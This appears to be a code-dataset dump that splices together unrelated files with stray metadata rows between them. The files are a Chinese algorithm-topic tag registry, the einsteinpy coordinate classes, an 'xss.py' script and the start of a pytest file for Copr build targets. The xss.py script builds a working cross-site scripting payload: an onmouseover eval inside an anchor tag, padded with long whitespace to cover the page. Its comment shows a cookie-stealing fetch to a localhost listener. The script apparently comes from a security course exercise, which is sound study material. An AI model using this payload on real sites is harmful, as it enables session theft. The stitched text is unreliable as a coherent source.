'traits': {
'structure': 1,
'graphic': 1
}
}
,
178: {
'name': '计数数列',
'appearance': None,
'parent': 175,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
179: {
'name': '斯特林数',
'appearance': None,
'parent': 178,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
180: {
'name': '卡特兰数',
'appearance': None,
'parent': 178,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
181: {
'name': '伯努利数',
'appearance': None,
'parent': 178,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
182: {
'name': '生成函数',
'appearance': None,
'parent': 175,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
183: {
'name': '杨氏矩阵',
'appearance': None,
'parent': 175,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
184: {
'name': 'Burnside引理',
'appearance': None,
'parent': 175,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
185: {
'name': 'Polya定理',
'appearance': None,
'parent': 184,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
186: {
'name': '博弈论与信息论',
'appearance': None,
'parent': 0,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
187: {
'name': '博弈基础',
'appearance': None,
'parent': 186,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
188: {
'name': '组合游戏',
'appearance': None,
'parent': 187,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
189: {
'name': '博弈树与DAG模型',
'appearance': None,
'parent': 188,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
190: {
'name': 'Sprague-Grundy函数',
'appearance': None,
'parent': 188,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
191: {
'name': 'Nim',
'appearance': None,
'parent': 188,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
192: {
'name': 'Nim积',
'appearance': None,
'parent': 191,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
193: {
'name': '威佐夫博弈',
'appearance': None,
'parent': 188,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
194: {
'name': '不平等博弈',
'appearance': None,
'parent': 187,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
195: {
'name': '超现实数',
'appearance': None,
'parent': 194,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
196: {
'name': '不完全信息博弈',
'appearance': None,
'parent': 187,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
197: {
'name': '通信与数据压缩',
'appearance': None,
'parent': 186,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
198: {
'name': '校验码',
'appearance': None,
'parent': 197,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
199: {
'name': '哈夫曼编码',
'appearance': None,
'parent': 197,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
200: {
'name': '游程编码',
'appearance': None,
'parent': 197,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
201: {
'name': '形式语言,自动机与串处理',
'appearance': None,
'parent': 0,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
202: {
'name': '串处理',
'appearance': None,
'parent': 201,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
203: {
'name': '模式匹配',
'appearance': None,
'parent': 202,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
204: {
'name': 'KMP算法',
'appearance': None,
'parent': 203,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
205: {
'name': 'AC自动机',
'appearance': None,
'parent': 203,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
206: {
'name': 'Shift-And算法',
'appearance': None,
'parent': 203,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
207: {
'name': '字典树',
'appearance': None,
'parent': 202,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
208: {
'name': '后缀树',
'appearance': None,
'parent': 207,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
209: {
'name': '后缀数组',
'appearance': None,
'parent': 208,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
210: {
'name': '后缀自动机',
'appearance': None,
'parent': 208,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
211: {
'name': 'Border',
'appearance': None,
'parent': 202,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
212: {
'name': 'Periodicity引理',
'appearance': None,
'parent': 211,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
213: {
'name': '回文串',
'appearance': None,
'parent': 202,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
214: {
'name': 'manacher算法',
'appearance': None,
'parent': 213,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
215: {
'name': '回文自动机',
'appearance': None,
'parent': 213,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
216: {
'name': '形式语言',
'appearance': None,
'parent': 201,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
217: {
'name': '正则表达式',
'appearance': None,
'parent': 216,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
218: {
'name': '有限状态自动机',
'appearance': None,
'parent': 216,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
219: {
'name': '并行计算',
'appearance': None,
'parent': 201,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
})
# Shorthand aliases into the `tags` registry defined above.
# Each name binds an abbreviation to a tag node by its numeric id so that
# later code can reference topics tersely (e.g. MR -> tags[173], the
# 'Miller-Robin' primality-test node; KMP -> tags[204]).
# NOTE(review): ids below 159 point at registry entries outside this
# excerpt — verify each abbreviation against the full tag table.
AG = tags[1]
DP = tags[2]
NF = tags[15]
EK = tags[20]
DC = tags[24]
LP = tags[25]
FP = tags[27]
GE = tags[28]
DAC = tags[29]
SR = tags[40]
DFS = tags[41]
BFS = tags[42]
AS = tags[44]
ID = tags[45]
MIM = tags[46]
RAN = tags[47]
HS = tags[54]
DS = tags[55]
STK = tags[56]
QUE = tags[57]
HST = tags[58]
HP = tags[59]
BST = tags[62]
THP = tags[63]
SPT = tags[64]
RBT = tags[65]
SGT = tags[66]
BIT = tags[67]
SGM = tags[68]
UFS = tags[70]
ST = tags[74]
KDT = tags[75]
DCT = tags[77]
LCT = tags[78]
ETT = tags[79]
GT = tags[82]
PM = tags[84]
KS = tags[85]
DJ = tags[91]
BFD = tags[92]
FL = tags[94]
BCC = tags[97]
SCC = tags[98]
KM = tags[101]
BL = tags[103]
GS = tags[106]
CG = tags[122]
AB = tags[134]
FT = tags[144]
FWT = tags[150]
NT = tags[155]
MR = tags[173]
CE = tags[175]
GF = tags[182]
GI = tags[186]
SG = tags[190]
NIM = tags[191]
FAS = tags[201]
STR = tags[202]
KMP = tags[204]
TRI = tags[207]
SA = tags[209]
SAM = tags[210]
PAM = tags[215]
RE = tags[217]
DFA = tags[218]
| 14.05196
| 33
| 0.450081
| 4,417
| 47,327
| 4.822504
| 0.122481
| 0.144594
| 0.206563
| 0.299516
| 0.826111
| 0.825454
| 0.825454
| 0.825454
| 0.825454
| 0.825454
| 0
| 0.072239
| 0.321994
| 47,327
| 3,367
| 34
| 14.056133
| 0.591592
| 0
| 0
| 0.62218
| 0
| 0
| 0.402411
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1092a8a7cbb969312c3237b7a219d3037f2ccbdc
| 9,308
|
py
|
Python
|
src/einsteinpy/coordinates/core.py
|
bibek22/einsteinpy
|
78bf5d942cbb12393852f8e4d7a8426f1ffe6f23
|
[
"MIT"
] | 2
|
2019-04-07T04:01:57.000Z
|
2019-07-11T11:59:55.000Z
|
src/einsteinpy/coordinates/core.py
|
bibek22/einsteinpy
|
78bf5d942cbb12393852f8e4d7a8426f1ffe6f23
|
[
"MIT"
] | null | null | null |
src/einsteinpy/coordinates/core.py
|
bibek22/einsteinpy
|
78bf5d942cbb12393852f8e4d7a8426f1ffe6f23
|
[
"MIT"
] | null | null | null |
import astropy.units as u
import numpy as np
from einsteinpy.coordinates.conversion import (
BoyerLindquistConversion,
CartesianConversion,
SphericalConversion,
)
class Cartesian(CartesianConversion):
    """
    Cartesian coordinates (x, y, z) with unit handling and
    conversions to the other supported coordinate systems.
    """

    @u.quantity_input(x=u.km, y=u.km, z=u.km)
    def __init__(self, x, y, z):
        """
        Constructor.

        Parameters
        ----------
        x : ~astropy.units.quantity.Quantity
        y : ~astropy.units.quantity.Quantity
        z : ~astropy.units.quantity.Quantity
        """
        self.x = x
        self.y = y
        self.z = z
        # The conversion base class operates on plain SI floats.
        super().__init__(x.si.value, y.si.value, z.si.value)
        self.system = "Cartesian"
        self._dimension = {"x": self.x, "y": self.y, "z": self.z, "system": self.system}
        self._dimension_order = ("x", "y", "z")

    def __repr__(self):
        return f"Cartesian x: {self.x}, y: {self.y}, z: {self.z}"

    def __str__(self):
        return self.__repr__()

    def __getitem__(self, item):
        """
        Return a coordinate component.

        Objects are subscriptable with both explicit parameter names
        and integer indices.

        Parameters
        ----------
        item : str or int
            Name of the parameter or its index.
            If ``'system'``, the name of the coordinate system is returned.
        """
        if isinstance(item, (int, np.integer)):
            item = self._dimension_order[item]
        return self._dimension[item]

    def si_values(self):
        """
        Return the coordinate values in SI units.

        Returns
        -------
        ~numpy.ndarray
            Array containing values in SI units (m, m, m)
        """
        quantities = (self.x.to(u.m), self.y.to(u.m), self.z.to(u.m))
        return np.array([q.value for q in quantities], dtype=float)

    def norm(self):
        """
        Euclidean norm of the position vector.

        Returns
        -------
        ~astropy.units.quantity.Quantity
            Euclidean norm with units.
        """
        return np.sqrt(self.x ** 2 + self.y ** 2 + self.z ** 2)

    def dot(self, target):
        """
        Dot product with another Cartesian vector.

        Parameters
        ----------
        target : ~einsteinpy.coordinates.core.Cartesian

        Returns
        -------
        ~astropy.units.quantity.Quantity
            Dot product with units
        """
        return self.x * target.x + self.y * target.y + self.z * target.z

    def to_spherical(self):
        """
        Convert to spherical coordinates.

        Returns
        -------
        ~einsteinpy.coordinates.core.Spherical
            Spherical representation of the Cartesian Coordinates.
        """
        r, theta, phi = self.convert_spherical()
        return Spherical(r * u.m, theta * u.rad, phi * u.rad)

    @u.quantity_input(a=u.km)
    def to_bl(self, a):
        """
        Convert to Boyer-Lindquist coordinates.

        Parameters
        ----------
        a : ~astropy.units.quantity.Quantity
            a = J/Mc, the angular momentum per unit mass of the
            black hole per speed of light.

        Returns
        -------
        ~einsteinpy.coordinates.core.BoyerLindquist
            BL representation of the Cartesian Coordinates.
        """
        r, theta, phi, spin = self.convert_bl(a.si.value)
        return BoyerLindquist(r * u.m, theta * u.rad, phi * u.rad, spin * u.m)
class Spherical(SphericalConversion):
    """
    Spherical coordinates (r, theta, phi) with unit handling and
    conversions to the other supported coordinate systems.
    """

    @u.quantity_input(r=u.km, theta=u.rad, phi=u.rad)
    def __init__(self, r, theta, phi):
        """
        Constructor.

        Parameters
        ----------
        r : ~astropy.units.quantity.Quantity
        theta : ~astropy.units.quantity.Quantity
        phi : ~astropy.units.quantity.Quantity
        """
        self.r = r
        self.theta = theta
        self.phi = phi
        # The conversion base class operates on plain SI floats.
        super().__init__(r.si.value, theta.si.value, phi.si.value)
        self.system = "Spherical"
        self._dimension = {
            "r": self.r,
            "theta": self.theta,
            "phi": self.phi,
            "system": self.system,
        }
        self._dimension_order = ("r", "theta", "phi")

    def __repr__(self):
        return f"Spherical r: {self.r}, theta: {self.theta}, phi: {self.phi}"

    def __str__(self):
        return self.__repr__()

    def __getitem__(self, item):
        """
        Return a coordinate component.

        Objects are subscriptable with both explicit parameter names
        and integer indices.

        Parameters
        ----------
        item : str or int
            Name of the parameter or its index.
            If ``'system'``, the name of the coordinate system is returned.
        """
        if isinstance(item, (int, np.integer)):
            item = self._dimension_order[item]
        return self._dimension[item]

    def si_values(self):
        """
        Return the coordinate values in SI units.

        Returns
        -------
        ~numpy.ndarray
            Array containing values in SI units (m, rad, rad)
        """
        quantities = (self.r.to(u.m), self.theta.to(u.rad), self.phi.to(u.rad))
        return np.array([q.value for q in quantities], dtype=float)

    def to_cartesian(self):
        """
        Convert to Cartesian coordinates.

        Returns
        -------
        ~einsteinpy.coordinates.core.Cartesian
            Cartesian representation of the Spherical Coordinates.
        """
        x, y, z = self.convert_cartesian()
        return Cartesian(x * u.m, y * u.m, z * u.m)

    @u.quantity_input(a=u.km)
    def to_bl(self, a):
        """
        Convert to Boyer-Lindquist coordinates.

        Parameters
        ----------
        a : ~astropy.units.quantity.Quantity
            a = J/Mc, the angular momentum per unit mass of the
            black hole per speed of light.

        Returns
        -------
        ~einsteinpy.coordinates.core.BoyerLindquist
            BL representation of the Spherical Coordinates.
        """
        r, theta, phi, spin = self.convert_bl(a.si.value)
        return BoyerLindquist(r * u.m, theta * u.rad, phi * u.rad, spin * u.m)
class BoyerLindquist(BoyerLindquistConversion):
    """
    Class for Boyer-Lindquist Coordinates and related transformations.
    """
    @u.quantity_input(r=u.km, theta=u.rad, phi=u.rad, a=u.km)
    def __init__(self, r, theta, phi, a):
        """
        Constructor.
        Parameters
        ----------
        r : ~astropy.units.quantity.Quantity
        theta : ~astropy.units.quantity.Quantity
        phi : ~astropy.units.quantity.Quantity
        a : ~astropy.units.quantity.Quantity
            Spin factor of the massive body.
        """
        self.r = r
        self.theta = theta
        self.phi = phi
        self.a = a
        # The conversion base class operates on plain SI floats.
        super().__init__(r.si.value, theta.si.value, phi.si.value, a=a.si.value)
        self.system = "BoyerLindquist"
        self._dimension = {
            "r": self.r,
            "theta": self.theta,
            "phi": self.phi,
            "a": self.a,
            "system": self.system,
        }
        # NOTE(review): 'a' is absent from the index order, so integer
        # subscripting only reaches r/theta/phi; the spin factor is
        # reachable by name via obj['a'] — confirm this is intentional.
        self._dimension_order = ("r", "theta", "phi")
    def __repr__(self):
        return "Boyer-Lindquist r: {}, theta: {}, phi: {} | a: {}".format(
            self.r, self.theta, self.phi, self.a
        )
    def __str__(self):
        return self.__repr__()
    def __getitem__(self, item):
        """
        Method to return coordinates.
        Objects are subscriptable with both explicit names of parameters
        and integer indices.
        Parameters
        ----------
        item : str or int
            Name of the parameter or its index.
            If ``'system'``, Name of coordinate is returned.
            If ``'a'``, spin factor of the body, ``self.a`` is returned.
        """
        if isinstance(item, (int, np.integer)):
            return self._dimension[self._dimension_order[item]]
        return self._dimension[item]
    def si_values(self):
        """
        Function for returning values in SI units.
        Note that the spin factor ``a`` is not included in the result.
        Returns
        -------
        ~numpy.ndarray
            Array containing values in SI units (m, rad, rad)
        """
        element_list = [self.r.to(u.m), self.theta.to(u.rad), self.phi.to(u.rad)]
        return np.array([e.value for e in element_list], dtype=float)
    def to_cartesian(self):
        """
        Method for conversion to cartesian coordinates.
        Returns
        -------
        ~einsteinpy.coordinates.core.Cartesian
            Cartesian representation of the BL Coordinates.
        """
        x, y, z = self.convert_cartesian()
        return Cartesian(x * u.m, y * u.m, z * u.m)
    def to_spherical(self):
        """
        Method for conversion to spherical coordinates.
        Returns
        -------
        ~einsteinpy.coordinates.core.Spherical
            Spherical representation of the BL Coordinates.
        """
        r, theta, phi = self.convert_spherical()
        return Spherical(r * u.m, theta * u.rad, phi * u.rad)
| 27.951952
| 95
| 0.549098
| 1,081
| 9,308
| 4.617946
| 0.111933
| 0.006811
| 0.05609
| 0.072917
| 0.807692
| 0.785857
| 0.771034
| 0.7502
| 0.746194
| 0.746194
| 0
| 0.000477
| 0.32456
| 9,308
| 332
| 96
| 28.036145
| 0.793542
| 0.37312
| 0
| 0.59292
| 0
| 0
| 0.044397
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.20354
| false
| 0
| 0.026549
| 0.053097
| 0.460177
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1093c6788d398eed0cd86a02950ab3b756ff35c4
| 65,891
|
py
|
Python
|
xss-1/xss.py
|
beelzebielsk/csc59938-week-7
|
3bacecfe57af0d2d900c9a69a788cae6d027865d
|
[
"Apache-2.0"
] | null | null | null |
xss-1/xss.py
|
beelzebielsk/csc59938-week-7
|
3bacecfe57af0d2d900c9a69a788cae6d027865d
|
[
"Apache-2.0"
] | null | null | null |
xss-1/xss.py
|
beelzebielsk/csc59938-week-7
|
3bacecfe57af0d2d900c9a69a788cae6d027865d
|
[
"Apache-2.0"
] | null | null | null |
import sys
from urllib.parse import quote_plus;
badString = "<a title=' onmouseover=eval(unescape(/{}/.source)) style=position:absolute;left:0;top:0;width:50000px;height:50000px                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  '/>"
# An example injection:
# fetch('http://localhost:8000?cookie='.concat(document.cookie))
injection = sys.stdin.read();
print(badString.format(quote_plus(injection)));
| 5,990.090909
| 65,670
| 0.998634
| 48
| 65,891
| 1,370.8125
| 0.791667
| 0.000274
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.000243
| 0.000425
| 65,891
| 10
| 65,671
| 6,589.1
| 0.998785
| 0.001305
| 0
| 0
| 0
| 0.2
| 0.997781
| 0.997584
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.4
| 0
| 0.4
| 0.2
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
52ac34f0094ea596af1cc3f9510e1b6c2784efe5
| 121
|
py
|
Python
|
src/omk_core/utils/__init__.py
|
adammichaelwood/omk_core
|
9f3a845aeadad0b1de91d7f20da3ae6b686a07d0
|
[
"MIT"
] | null | null | null |
src/omk_core/utils/__init__.py
|
adammichaelwood/omk_core
|
9f3a845aeadad0b1de91d7f20da3ae6b686a07d0
|
[
"MIT"
] | null | null | null |
src/omk_core/utils/__init__.py
|
adammichaelwood/omk_core
|
9f3a845aeadad0b1de91d7f20da3ae6b686a07d0
|
[
"MIT"
] | null | null | null |
from .mus_utils import *
from .py_utils import *
from .method_dispatch import methoddispatch
from .m21_utils import play
| 24.2
| 43
| 0.818182
| 18
| 121
| 5.277778
| 0.555556
| 0.347368
| 0.315789
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019048
| 0.132231
| 121
| 4
| 44
| 30.25
| 0.885714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
52c4cfde8a4f841b85a53700c7687ffed81c1af0
| 9,227
|
py
|
Python
|
tests/unit/test_build_helper.py
|
FalseG0d/packit-service
|
03f840cdfbcc129582a2ec2a20f069c85fea0c56
|
[
"MIT"
] | 1
|
2020-03-28T13:57:08.000Z
|
2020-03-28T13:57:08.000Z
|
tests/unit/test_build_helper.py
|
FalseG0d/packit-service
|
03f840cdfbcc129582a2ec2a20f069c85fea0c56
|
[
"MIT"
] | null | null | null |
tests/unit/test_build_helper.py
|
FalseG0d/packit-service
|
03f840cdfbcc129582a2ec2a20f069c85fea0c56
|
[
"MIT"
] | null | null | null |
import pytest
from flexmock import flexmock
from packit.config import PackageConfig, JobConfig, JobType, JobConfigTriggerType
from packit_service.service.events import TheJobTriggerType
from packit_service.worker.build.copr_build import CoprBuildJobHelper
# Each case is (jobs, trigger, expected build chroots, expected test chroots).
# Note: short target names like "fedora-29" are expected to resolve to full
# chroot names ("fedora-29-x86_64"); an empty metadata dict falls back to the
# defaults (fedora-30/31 per the expectations below) — see cases without targets.
@pytest.mark.parametrize(
    "jobs,trigger,build_targets,test_targets",
    [
        pytest.param(
            [
                JobConfig(
                    type=JobType.copr_build,
                    trigger=JobConfigTriggerType.pull_request,
                    metadata={"targets": ["fedora-29", "fedora-31"]},
                )
            ],
            TheJobTriggerType.pull_request,
            {"fedora-29-x86_64", "fedora-31-x86_64"},
            set(),
            id="build_with_targets",
        ),
        pytest.param(
            [
                JobConfig(
                    type=JobType.copr_build,
                    trigger=JobConfigTriggerType.pull_request,
                    metadata={"targets": ["fedora-29", "fedora-31"]},
                )
            ],
            TheJobTriggerType.pr_comment,
            {"fedora-29-x86_64", "fedora-31-x86_64"},
